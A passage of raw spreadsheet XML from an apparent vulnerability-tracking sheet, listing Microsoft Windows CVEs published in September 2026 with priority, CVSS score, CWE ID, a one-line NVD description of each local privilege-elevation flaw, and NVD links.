      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69407</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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09" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69432</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
